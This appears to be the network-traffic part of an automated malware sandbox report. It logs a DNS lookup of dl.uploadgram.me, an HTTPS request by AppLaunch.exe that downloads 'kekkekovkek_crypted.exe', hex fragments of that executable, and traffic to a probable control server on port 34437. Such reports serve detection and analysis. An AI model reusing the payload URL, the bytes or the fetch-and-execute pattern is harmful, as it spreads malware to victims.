                                                                                                                                                                                    May 23, 2022 18:54:51.516794920 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.516829014 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.516872883 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.516879082 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.516899109 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.516923904 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.516947985 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.516974926 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.517018080 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.517024040 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.517069101 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.517096996 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.517127991 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.517184019 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.517191887 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.517232895 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.517241955 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.517256975 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.517282963 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.517302990 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.517353058 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.517360926 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.517406940 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.517687082 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.538737059 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.538777113 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.538832903 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.538849115 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.538876057 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.538877964 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.538908005 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.538908958 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.538922071 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.538959980 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.539001942 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.539053917 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.539082050 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.539113998 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.539120913 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.539149046 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.539170980 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.539176941 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.539191008 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.539215088 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.539247990 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.539253950 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.539277077 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.539300919 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540060997 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540087938 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540143013 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540148973 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540183067 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540242910 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540254116 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540261030 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540297985 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540312052 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540380955 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540572882 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540601969 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540641069 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540651083 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540674925 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540700912 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540723085 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540747881 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540796995 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540803909 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540837049 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540852070 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540859938 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540867090 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540903091 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540904045 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540939093 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.540946007 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540981054 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.540996075 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541009903 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541021109 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541028976 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541035891 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541088104 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541115046 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541131020 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541166067 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541197062 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541203022 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541233063 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541260004 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541295052 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541330099 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541364908 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541371107 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541409969 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541435003 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541440964 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541450024 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541496992 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541538000 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541567087 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541601896 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541656017 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541681051 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541727066 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541732073 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541752100 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541779995 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541785955 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541800022 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541825056 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541852951 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541858912 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541903019 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541932106 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.541943073 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.541950941 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542001009 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542002916 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542017937 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542119980 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542125940 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542130947 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542146921 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542196035 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542220116 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542229891 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542262077 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542269945 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542289972 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542295933 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542304039 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542350054 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542396069 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542401075 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542414904 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542439938 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542473078 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542479992 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542526007 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542552948 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542576075 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542581081 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542584896 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542607069 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542632103 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542660952 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542669058 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542705059 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542716980 CEST44349769176.9.247.226192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:51.542743921 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.542772055 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.544717073 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.546197891 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:51.561587095 CEST49769443192.168.2.4176.9.247.226
                                                                                                                                                                                    May 23, 2022 18:54:53.473993063 CEST4976034437192.168.2.4185.106.92.73
                                                                                                                                                                                    May 23, 2022 18:54:53.507194042 CEST3443749760185.106.92.73192.168.2.4
                                                                                                                                                                                    May 23, 2022 18:54:53.562592983 CEST4976034437192.168.2.4185.106.92.73
                                                                                                                                                                                    May 23, 2022 18:54:53.717794895 CEST4976034437192.168.2.4185.106.92.73

                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    May 23, 2022 18:54:49.605154991 CEST6064753192.168.2.48.8.8.8
                                                                                                                                                                                    May 23, 2022 18:54:49.627310038 CEST53606478.8.8.8192.168.2.4

                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                    May 23, 2022 18:54:49.605154991 CEST192.168.2.48.8.8.80xfbe5Standard query (0)dl.uploadgram.meA (IP address)IN (0x0001)

                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                    May 23, 2022 18:54:49.627310038 CEST8.8.8.8192.168.2.40xfbe5No error (0)dl.uploadgram.me176.9.247.226A (IP address)IN (0x0001)

                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                    • dl.uploadgram.me

                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    0192.168.2.449769176.9.247.226443C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2022-05-23 16:54:50 UTC0OUTGET /628a4c7f14fb9g?raw HTTP/1.1
                                                                                                                                                                                    Host: dl.uploadgram.me
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2022-05-23 16:54:51 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                    Date: Mon, 23 May 2022 16:54:50 GMT
                                                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                                                    Content-Length: 1878984
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cache-control: max-age=31556926
                                                                                                                                                                                    content-transfer-encoding: Binary
                                                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                                                    content-disposition: attachment; filename="kekkekovkek_crypted.exe"; filename*=utf-8''kekkekovkek_crypted.exe
                                                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                                                    x-robots-tag: noindex
                                                                                                                                                                                    2022-05-23 16:54:51 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 75 4c 8a 62 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 1c 00 86 0b 00 00 80 1c 00 00 0c 00 00 e0 12 00 00 00 10 00 00 00 a0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 1c 00 00 04 00 00 09 c8 1c 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELuLb@
                                                                                                                                                                                    2022-05-23 16:54:51 UTC16INData Raw: 01 00 00 89 85 3c ff ff ff 8d 83 62 01 00 00 89 85 b4 fd ff ff 8d 83 1d 01 00 00 89 85 c4 fe ff ff 8d 83 ff 00 00 00 89 85 b0 fd ff ff 89 8d b8 fe ff ff 8d 8b 8e 01 00 00 89 bd 98 fd ff ff 8d bb 9e 01 00 00 8d 83 2c 01 00 00 89 8d 38 ff ff ff 8d 8b f2 00 00 00 89 bd b4 fe ff ff 8d bb 45 01 00 00 89 85 ac fd ff ff 89 8d 94 fd ff ff 8d 8b 5c 01 00 00 8d 83 87 01 00 00 89 7d 88 8d bb 8f 01 00 00 89 8d b0 fe ff ff 8d 8b eb 00 00 00 89 85 a8 fd ff ff 89 bd 90 fd ff ff 8d bb 12 01 00 00 8d 83 0a 01 00 00 89 8d ac fe ff ff 8d 8b fb 00 00 00 89 bd 8c fd ff ff 8d bb 61 01 00 00 89 85 a4 fd ff ff 89 8d 88 fd ff ff 8d 8b 24 01 00 00 8d 83 30 01 00 00 89 bd a8 fe ff ff 8d bb 4c 01 00 00 89 8d a4 fe ff ff 8d 8b 9a 01 00 00 89 85 c0 fe ff ff 89 bd a0 fe ff ff 8d bb 39
                                                                                                                                                                                    Data Ascii: <b,8E\}a$0L9
                                                                                                                                                                                    2022-05-23 16:54:51 UTC32INData Raw: 00 89 85 30 ff ff ff 8d 83 0e 01 00 00 89 85 74 fe ff ff 8d 83 34 01 00 00 89 85 70 fe ff ff 8d 83 89 01 00 00 89 85 2c ff ff ff 8d 83 96 01 00 00 89 85 6c fe ff ff 8d 83 23 01 00 00 89 85 68 fe ff ff 8d 83 99 01 00 00 89 85 64 fe ff ff 8d 83 f7 00 00 00 0f af 45 e4 89 85 60 fd ff ff 8d 83 74 01 00 00 0f af 85 70 fe ff ff 89 85 28 ff ff ff 8d 83 06 01 00 00 8d 84 18 9d 01 00 00 89 85 5c fd ff ff 8d 83 6c 01 00 00 03 85 2c ff ff ff 89 85 60 fe ff ff 8d 83 82 01 00 00 0f af 85 70 ff ff ff 89 85 5c fe ff ff 8d 83 ab 01 00 00 0f af 85 4c ff ff ff 89 85 24 ff ff ff 8d 83 78 01 00 00 01 f8 89 85 58 fe ff ff 8d 83 ed 00 00 00 0f af 45 ac 89 85 54 fe ff ff 8d 83 6f 01 00 00 03 45 90 89 85 50 fe ff ff 8d 83 ae 01 00 00 03 85 48 ff ff ff 89 45 c4 8d 83 f3 00 00 00
                                                                                                                                                                                    Data Ascii: 0t4p,l#hdE`tp(\l,`p\L$xXEToEPHE
                                                                                                                                                                                    2022-05-23 16:54:51 UTC48INData Raw: 0f af 85 a4 fe ff ff 89 85 68 fd ff ff 8d 83 18 01 00 00 0f af 45 cc 89 85 10 ff ff ff 8d 83 9a 01 00 00 03 45 90 89 85 64 fd ff ff 8d 83 18 01 00 00 0f af 85 48 fe ff ff 89 85 60 fd ff ff 8d 83 07 01 00 00 01 f8 89 85 0c ff ff ff 8d 83 5b 01 00 00 0f af 45 e0 89 85 08 ff ff ff 8d 83 ef 00 00 00 0f af 85 74 fe ff ff 89 85 04 ff ff ff 8d 83 7f 01 00 00 03 85 54 ff ff ff 89 85 5c fd ff ff 8d 83 ea 00 00 00 01 c0 89 85 58 fd ff ff 8d 83 07 01 00 00 03 85 28 ff ff ff 89 85 54 fd ff ff 8d 83 91 01 00 00 0f af 85 70 ff ff ff 89 85 00 ff ff ff 8d 83 14 01 00 00 8d 84 18 1e 01 00 00 89 85 50 fd ff ff 8d 83 ed 00 00 00 01 d0 89 85 d4 fe ff ff 8d 83 18 01 00 00 0f af 85 08 ff ff ff 89 85 40 fe ff ff 8d 83 7f 01 00 00 0f af 85 44 ff ff ff 89 85 fc fe ff ff 8d 83 7f
                                                                                                                                                                                    Data Ascii: hEEdH`[EtT\X(TpP@D
                                                                                                                                                                                    2022-05-23 16:54:51 UTC64INData Raw: ff ff 8d 86 ee 00 00 00 89 8d 84 fe ff ff 89 85 38 ff ff ff 7f 0e 8d 86 20 01 00 00 01 c8 89 85 38 ff ff ff 8d 86 93 01 00 00 03 45 80 8d 8e f4 00 00 00 03 8d 78 fe ff ff 89 85 74 fe ff ff 8d 86 ee 00 00 00 03 45 98 89 85 78 fd ff ff 8d 86 b0 01 00 00 0f af 45 dc 89 85 70 fe ff ff 8d 86 ad 01 00 00 0f af 45 b4 89 85 6c fe ff ff 8d 86 42 01 00 00 03 85 d4 fe ff ff 89 85 74 fd ff ff 8d 86 1f 01 00 00 03 85 38 ff ff ff 89 85 70 fd ff ff 8d 86 1a 01 00 00 0f af 45 e4 89 85 68 fe ff ff 8d 86 50 01 00 00 8b bd 68 fe ff ff 0f af 85 b0 fe ff ff 39 bd 78 ff ff ff 89 85 6c fd ff ff 7d 06 8d 8e 41 01 00 00 8d 86 81 01 00 00 03 85 80 fe ff ff 89 85 68 fd ff ff 8d 86 02 01 00 00 0f af 45 a4 89 85 64 fd ff ff 8d 86 58 01 00 00 0f af 85 50 ff ff ff 89 85 64 fe ff ff 8d
                                                                                                                                                                                    Data Ascii: 8 8ExtExEpElBt8pEhPh9xl}AhEdXPd
                                                                                                                                                                                    2022-05-23 16:54:51 UTC80INData Raw: 10 ff ff ff 03 85 24 ff ff ff 03 85 58 fe ff ff 03 85 20 ff ff ff 03 45 a0 03 45 c0 03 85 54 fe ff ff 03 85 08 ff ff ff 03 85 50 fe ff ff 03 45 b8 03 85 70 ff ff ff 03 85 04 ff ff ff 8b 55 9c 03 85 00 ff ff ff 03 85 6c ff ff ff 03 85 4c fe ff ff 03 85 fc fe ff ff 03 85 00 ff ff ff 03 85 48 fe ff ff 03 85 78 ff ff ff 03 85 3c ff ff ff 03 85 28 ff ff ff 03 85 44 fe ff ff 03 85 40 fe ff ff 03 45 88 03 85 3c fe ff ff 03 85 38 fe ff ff 03 85 f8 fe ff ff 03 85 f4 fe ff ff 03 85 68 ff ff ff 03 85 f0 fe ff ff 03 85 34 fe ff ff 03 85 68 ff ff ff 03 85 9c fe ff ff 03 85 84 fe ff ff 03 85 ec fe ff ff 03 45 e4 03 85 98 fe ff ff 03 45 98 03 85 38 ff ff ff 03 85 40 ff ff ff 03 85 30 fe ff ff 01 f0 0f af 95 44 ff ff ff 01 d0 03 85 e8 fe ff ff 03 45 e0 03 85 2c fe ff ff
                                                                                                                                                                                    Data Ascii: $X EETPEpUlLHx<(D@E<8h4hEE8@0DE,
                                                                                                                                                                                    2022-05-23 16:54:51 UTC96INData Raw: d8 e8 89 fc ff ff 85 c0 89 c5 74 b3 83 38 31 75 ae 8b 40 04 8b 4b 30 bf 8c 72 58 00 8b 50 08 8b 30 8d 54 11 07 b9 03 00 00 00 89 53 30 f3 a6 75 8e 89 d8 e8 37 d9 ff ff 89 e9 89 04 24 ba 36 00 00 00 89 d8 e8 e6 d4 ff ff 89 c5 8b 43 0c 0f b6 00 eb 9b 83 c1 01 89 d8 89 4b 0c e8 0f d9 ff ff 85 c0 89 c5 74 24 8b 53 0c 0f b6 02 3c 5f 0f 85 7a ff ff ff 83 c2 01 8d 43 0c 89 53 0c e8 8d d7 ff ff 85 c0 0f 89 35 ff ff ff 83 c4 1c 31 ed 5b 89 e8 5e 5f 5d c3 89 f6 8d bc 27 00 00 00 00 8d 41 01 31 ed 89 43 0c 0f b6 41 01 3c 6c 0f 85 3b ff ff ff 83 c1 02 89 d8 89 4b 0c e8 6f fd ff ff 85 c0 89 c6 0f 84 f5 fe ff ff 8b 53 0c 0f b6 02 3c 45 0f 85 16 ff ff ff 83 c2 01 89 d8 89 53 0c e8 ea d7 ff ff 85 c0 78 38 8b 53 14 3b 53 18 7d 30 8b 4b 10 8d 3c 52 83 c2 01 89 53 14 8d 2c
                                                                                                                                                                                    Data Ascii: t81u@K0rXP0TS0u7$6CKt$S<_zCS51[^_]'A1CA<l;KoS<ESx8S;S}0K<RS,
                                                                                                                                                                                    2022-05-23 16:54:51 UTC112INData Raw: ff 8b 83 0c 01 00 00 c6 83 ff 00 00 00 00 c7 44 24 04 ff 00 00 00 89 1c 24 89 44 24 08 ff 93 08 01 00 00 c7 83 00 01 00 00 00 00 00 00 83 83 24 01 00 00 01 e9 88 d7 ff ff 8b 83 0c 01 00 00 c6 83 ff 00 00 00 00 c7 44 24 04 ff 00 00 00 89 1c 24 89 44 24 08 ff 93 08 01 00 00 83 83 24 01 00 00 01 ba 01 00 00 00 31 c0 e9 c1 e4 ff ff 8b 83 0c 01 00 00 c6 83 ff 00 00 00 00 c7 44 24 04 ff 00 00 00 89 1c 24 89 44 24 08 ff 93 08 01 00 00 83 83 24 01 00 00 01 ba 01 00 00 00 31 c0 e9 5c ef ff ff 8b 54 24 18 89 e9 89 d8 e8 9f 0a 00 00 e9 97 cb ff ff 0f b6 00 8d 50 8e 80 fa 01 76 0b 83 e8 63 3c 01 0f 87 5c ca ff ff 8b 54 24 18 89 d8 e8 59 1c 00 00 8b 83 00 01 00 00 3d ff 00 00 00 0f 84 1a 06 00 00 8d 50 01 8b 7c 24 18 89 93 00 01 00 00 c6 04 03 3c c6 83 04 01 00 00 3c
                                                                                                                                                                                    Data Ascii: D$$D$$D$$D$$1D$$D$$1\T$Pvc<\T$Y=P|$<<
